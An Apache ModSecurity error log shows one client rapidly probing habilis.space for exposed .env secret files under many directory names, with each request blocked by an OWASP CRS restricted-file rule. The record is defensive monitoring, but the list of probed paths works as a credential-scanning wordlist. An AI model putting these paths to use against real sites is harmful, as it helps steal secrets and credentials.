[Mon May 11 17:33:48.918148 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backups/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/backups/.env"] [unique_id "agH23Py_GXSWIKeli0sMNwAAAI8"]
[Mon May 11 17:33:48.918430 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/backups/.env"] [unique_id "agH23Py_GXSWIKeli0sMNwAAAI8"]
[Mon May 11 17:33:48.918662 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23Py_GXSWIKeli0sMNwAAAI8"]
[Mon May 11 17:33:49.050302 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/old/.env"] [unique_id "agH23fy_GXSWIKeli0sMOAAAAI8"]
[Mon May 11 17:33:49.050538 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/old/.env"] [unique_id "agH23fy_GXSWIKeli0sMOAAAAI8"]
[Mon May 11 17:33:49.050757 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23fy_GXSWIKeli0sMOAAAAI8"]
[Mon May 11 17:33:49.161920 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/tmp/.env"] [unique_id "agH23fy_GXSWIKeli0sMOQAAAI8"]
[Mon May 11 17:33:49.162138 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/tmp/.env"] [unique_id "agH23fy_GXSWIKeli0sMOQAAAI8"]
[Mon May 11 17:33:49.162363 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23fy_GXSWIKeli0sMOQAAAI8"]
[Mon May 11 17:33:49.274019 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/temp/.env"] [unique_id "agH23fy_GXSWIKeli0sMOgAAAI8"]
[Mon May 11 17:33:49.274256 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/temp/.env"] [unique_id "agH23fy_GXSWIKeli0sMOgAAAI8"]
[Mon May 11 17:33:49.274486 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23fy_GXSWIKeli0sMOgAAAI8"]
[Mon May 11 17:33:49.385951 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/lab/.env"] [unique_id "agH23fy_GXSWIKeli0sMOwAAAI8"]
[Mon May 11 17:33:49.386200 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/lab/.env"] [unique_id "agH23fy_GXSWIKeli0sMOwAAAI8"]
[Mon May 11 17:33:49.386432 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23fy_GXSWIKeli0sMOwAAAI8"]
[Mon May 11 17:33:49.559657 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/cronlab/.env"] [unique_id "agH23fy_GXSWIKeli0sMPAAAAI8"]
[Mon May 11 17:33:49.559883 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/cronlab/.env"] [unique_id "agH23fy_GXSWIKeli0sMPAAAAI8"]
[Mon May 11 17:33:49.560126 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23fy_GXSWIKeli0sMPAAAAI8"]
[Mon May 11 17:33:49.713737 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/cron/.env"] [unique_id "agH23fy_GXSWIKeli0sMPQAAAI8"]
[Mon May 11 17:33:49.713954 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/cron/.env"] [unique_id "agH23fy_GXSWIKeli0sMPQAAAI8"]
[Mon May 11 17:33:49.714167 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23fy_GXSWIKeli0sMPQAAAI8"]
[Mon May 11 17:33:49.825504 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/en/.env"] [unique_id "agH23fy_GXSWIKeli0sMPgAAAI8"]
[Mon May 11 17:33:49.825727 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/en/.env"] [unique_id "agH23fy_GXSWIKeli0sMPgAAAI8"]
[Mon May 11 17:33:49.825942 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23fy_GXSWIKeli0sMPgAAAI8"]
[Mon May 11 17:33:49.937100 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/administrator/.env"] [unique_id "agH23fy_GXSWIKeli0sMPwAAAI8"]
[Mon May 11 17:33:49.937346 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/administrator/.env"] [unique_id "agH23fy_GXSWIKeli0sMPwAAAI8"]
[Mon May 11 17:33:49.937576 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23fy_GXSWIKeli0sMPwAAAI8"]
[Mon May 11 17:33:50.050791 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/psnlink/.env"] [unique_id "agH23vy_GXSWIKeli0sMQAAAAI8"]
[Mon May 11 17:33:50.051004 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/psnlink/.env"] [unique_id "agH23vy_GXSWIKeli0sMQAAAAI8"]
[Mon May 11 17:33:50.051210 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23vy_GXSWIKeli0sMQAAAAI8"]
[Mon May 11 17:33:50.168727 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/exapi/.env"] [unique_id "agH23vy_GXSWIKeli0sMQQAAAI8"]
[Mon May 11 17:33:50.169020 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/exapi/.env"] [unique_id "agH23vy_GXSWIKeli0sMQQAAAI8"]
[Mon May 11 17:33:50.178198 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23vy_GXSWIKeli0sMQQAAAI8"]
[Mon May 11 17:33:50.290899 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/sitemaps/.env"] [unique_id "agH23vy_GXSWIKeli0sMQgAAAI8"]
[Mon May 11 17:33:50.291125 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/sitemaps/.env"] [unique_id "agH23vy_GXSWIKeli0sMQgAAAI8"]
[Mon May 11 17:33:50.291369 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23vy_GXSWIKeli0sMQgAAAI8"]
[Mon May 11 17:33:50.528078 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.backup1"] [unique_id "agH23vy_GXSWIKeli0sMQwAAAI8"]
[Mon May 11 17:33:50.528303 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.backup1"] [unique_id "agH23vy_GXSWIKeli0sMQwAAAI8"]
[Mon May 11 17:33:50.528554 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH23vy_GXSWIKeli0sMQwAAAI8"]
[Mon May 11 17:33:50.640367 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.backup2"] [unique_id "agH23vy_GXSWIKeli0sMRAAAAI8"]
